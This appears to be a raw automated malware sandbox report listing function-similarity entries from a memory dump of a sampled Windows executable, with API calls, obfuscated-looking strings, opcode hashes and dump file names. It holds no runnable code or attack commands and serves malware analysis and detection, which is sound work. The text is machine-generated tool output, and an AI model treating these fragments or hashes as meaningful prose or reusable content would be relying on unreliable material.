                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                        • API String ID: 0-1866435925
                                                                                                                                                                                                                                        • Opcode ID: 9572f3753e91d903ba2de543953938972b17d788e161e23707568e3d35e17821
                                                                                                                                                                                                                                        • Instruction ID: 9884c130721fa764d431f515c99aef6e2cf58f866da5a0b56e93f13136b181b4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9572f3753e91d903ba2de543953938972b17d788e161e23707568e3d35e17821
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9051AB27F48624478E28A5294CC26BFB1C387D8324F27812ADCA5A73E4DB78DD434BC1
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: =s'a$=s'a$=s'a
                                                                                                                                                                                                                                        • API String ID: 0-3308811078
                                                                                                                                                                                                                                        • Opcode ID: 3d7f9af25f6849820bd256b4c94a18a467f3eded7e352fee142a89e5ff266b41
                                                                                                                                                                                                                                        • Instruction ID: 206b8f343c07f3e3492856d47163ffdacca49c464acf062abfc6659d1845fb6d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d7f9af25f6849820bd256b4c94a18a467f3eded7e352fee142a89e5ff266b41
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C517A36305B008FCB2C95389CE92BB77DB9B8A361F75C53DE80AC7290E3748D894611
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 2dP7$2dP7$2dP7
                                                                                                                                                                                                                                        • API String ID: 0-1671582929
                                                                                                                                                                                                                                        • Opcode ID: 216e5cce35ee86c9a347be8a10fce2b8e80e3bd7565f967ca09aa56f03dd83ed
                                                                                                                                                                                                                                        • Instruction ID: fe60642c2bcf31533260414ee95374d467ddf5c8d92b3a011f487206fa9fbbc2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 216e5cce35ee86c9a347be8a10fce2b8e80e3bd7565f967ca09aa56f03dd83ed
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9941F7357023119BD614CA3998D626E73F5BBD5350FA9C82AE45EC7260C729CC89D782
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: l3U$l3U
                                                                                                                                                                                                                                        • API String ID: 0-3338743744
                                                                                                                                                                                                                                        • Opcode ID: b06c653df765e3a4737d5377153973649adc6273fd2bb1b719fce2e3561c216d
                                                                                                                                                                                                                                        • Instruction ID: 6f70e63bb878c39b012415c9729b0c67fdfccd2482b8337171b93070f7edd333
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b06c653df765e3a4737d5377153973649adc6273fd2bb1b719fce2e3561c216d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E428A3B7106024FDB18993888A62FE37D2DBD6354F29C92ED855C7294EF29CD4A8F41
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: m#5$m#5
                                                                                                                                                                                                                                        • API String ID: 0-3624771814
                                                                                                                                                                                                                                        • Opcode ID: ce105cc8a7fa5b7dec18c968851c3a87c1c342e6ffb2dc731391c23a0eaf4a75
                                                                                                                                                                                                                                        • Instruction ID: 679cfc1645a2be0c79f9f16fa8be55456a8c2134c211e50a176469cda38c4621
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce105cc8a7fa5b7dec18c968851c3a87c1c342e6ffb2dc731391c23a0eaf4a75
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B71D5B6704316CFCA249E2985D829EB7F19B85344F26C52AE84EC7351D325DC8DCB83
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: KEM$KEM
                                                                                                                                                                                                                                        • API String ID: 0-802700390
                                                                                                                                                                                                                                        • Opcode ID: e679cf8277c5855bd399ea99b58a9d7bde0a5b89deeccbc41d9fad2ca2690c24
                                                                                                                                                                                                                                        • Instruction ID: 8047dfc92c95a2e663130614b318eca81a736048c1b23d4bb4d7c28cfb3714ae
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e679cf8277c5855bd399ea99b58a9d7bde0a5b89deeccbc41d9fad2ca2690c24
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3271D77A70C2418FC724CD2CD4846AEB7E2AFD5310F26D95AE898D7394D731DC458B82
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 7b4d6fe2ab4e17ec43783b01e00219c6307f3bfcaab692acbef9bc95a9536a3f
                                                                                                                                                                                                                                        • Instruction ID: 823d0a3dd8c0eccaaac9fcd7bd16b0d1517b5c836fdc134ac1f7fec16425b294
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b4d6fe2ab4e17ec43783b01e00219c6307f3bfcaab692acbef9bc95a9536a3f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB02BD756083008FCB18CE28C895B6E7BF2AB95394F14892DE8A9C7351D336DE45AB53
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 0018CD90
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___std_exception_copy
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2659868963-0
                                                                                                                                                                                                                                        • Opcode ID: c19a7f4647d560c135557dca2c1f85c3d6c5e5474a7efa42532b839e55ed8adb
                                                                                                                                                                                                                                        • Instruction ID: 4e46e104c6e192fa4e936390583661475b857a0e23b03134c8d2cab845e49318
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c19a7f4647d560c135557dca2c1f85c3d6c5e5474a7efa42532b839e55ed8adb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89C18732B016048BDF189A28D4A17EF7BE3AFD5350F29442AD846AB345DB359E458FA0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,03011369,?,00000008,?,?,001A9244,03011369,?,00000008,?,?,001AAEC3,00000000), ref: 001A9516
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                                                                                                                        • Opcode ID: 79a666bc6b7a054614ee517e3655a511267c80366a32042a510008d7479c958e
                                                                                                                                                                                                                                        • Instruction ID: c247150cc9f1efeec2f8674aeb0e078873170c08e1fd8b5c45232734501e1299
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 79a666bc6b7a054614ee517e3655a511267c80366a32042a510008d7479c958e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29B14F39510608DFDB19CF28C586B657BE0FF4A364F258659E8DACF2A1C735D982CB40
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: d
                                                                                                                                                                                                                                        • API String ID: 0-2564639436
                                                                                                                                                                                                                                        • Opcode ID: b9b7f29285ee127098cd9d2303116aa51076d09e6e6c719ac60474b69022cb28
                                                                                                                                                                                                                                        • Instruction ID: 48610cab9ce52d5dbd6b7a4067a00844986c9dd192e158a420492fc1fcac780a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b9b7f29285ee127098cd9d2303116aa51076d09e6e6c719ac60474b69022cb28
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9CF14C7BB287004B975CCE69C89123EB6E2ABC8314F19D82EF59AC7350DF78CD415686
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 001A0CC4: RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,0019FE5F,00000001,00000364,00000005,000000FF,?,00000000,?,00195765,00000000,25181615), ref: 001A0D05
                                                                                                                                                                                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001A5A39
                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 001A5B2D
                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 001A5B6C
                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 001A5B9F
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Find$CloseFile$AllocateFirstHeapNext
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4087847297-0
                                                                                                                                                                                                                                        • Opcode ID: f6744c57563ad4bc465784c889288a8b871ec268aa01feae5c2dea06ce6c2493
                                                                                                                                                                                                                                        • Instruction ID: 5ef99407ad9ef836bab81d1c4221e0d80d384323af921d60f77aa114584f4a06
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f6744c57563ad4bc465784c889288a8b871ec268aa01feae5c2dea06ce6c2493
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02513779908618AFDF149F289C85ABF77BADF56328F1441ADF419DB201EB308D429B60
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _strlen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4218353326-0
                                                                                                                                                                                                                                        • Opcode ID: 45ca256325a33b4b68bbe93b4eb6dd5bd688ef83d6784328a4e268b5635f6314
                                                                                                                                                                                                                                        • Instruction ID: 4f5bce0403f0bad547614581fb903a37ca8e5f0881455f36a0ac03e2ef9fa915
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 45ca256325a33b4b68bbe93b4eb6dd5bd688ef83d6784328a4e268b5635f6314
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE5125357092019FDB18AE24C4D47AFBBE3ABC6350F19882DE8884B266D775DD448F92
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 001910EC
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2325560087-0
                                                                                                                                                                                                                                        • Opcode ID: 04247b8c6119e21bcf618d1fadfcaffc790045743e592e31132a106d32042b2d
                                                                                                                                                                                                                                        • Instruction ID: 60ebcb3a527626dee6e848146c0b23d9bd1d55a5051d5ece3461e9e7df0d200c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04247b8c6119e21bcf618d1fadfcaffc790045743e592e31132a106d32042b2d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63519271E11616EBEB25CFA4D9917AEBBF1FB48300F24812AC419EB250D374D980CB50
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0019FC1A: GetLastError.KERNEL32(00000000,?,001A1F9D), ref: 0019FC1E
                                                                                                                                                                                                                                          • Part of subcall function 0019FC1A: SetLastError.KERNEL32(00000000,?,?,00000028,0019AC4F), ref: 0019FCC0
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001A51F4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3736152602-0
                                                                                                                                                                                                                                        • Opcode ID: b7a1c56dc7686758d6162fe43292e2adfb95c39860d5954f90479b5c6924dfac
                                                                                                                                                                                                                                        • Instruction ID: befbd1fecb0f94acc04915343df21cc530f23e27f8499e5edaeb29655650dc04
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7a1c56dc7686758d6162fe43292e2adfb95c39860d5954f90479b5c6924dfac
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5219276608606EBDF289A24DC42BBA77A9EF5A315B10407AFD02D7141EB39ED418B50
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0019FC1A: GetLastError.KERNEL32(00000000,?,001A1F9D), ref: 0019FC1E
                                                                                                                                                                                                                                          • Part of subcall function 0019FC1A: SetLastError.KERNEL32(00000000,?,?,00000028,0019AC4F), ref: 0019FCC0
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001A5314
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3736152602-0
                                                                                                                                                                                                                                        • Opcode ID: 6eb5a205fed55e7f8540d08a2a7ef5db21dd7c06cdf6e8e01ebf76ab310ab660
                                                                                                                                                                                                                                        • Instruction ID: 914c38a1f7ea2b9146a8671df2ae36de113b83fc129935608bb2322b218eb3c7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6eb5a205fed55e7f8540d08a2a7ef5db21dd7c06cdf6e8e01ebf76ab310ab660
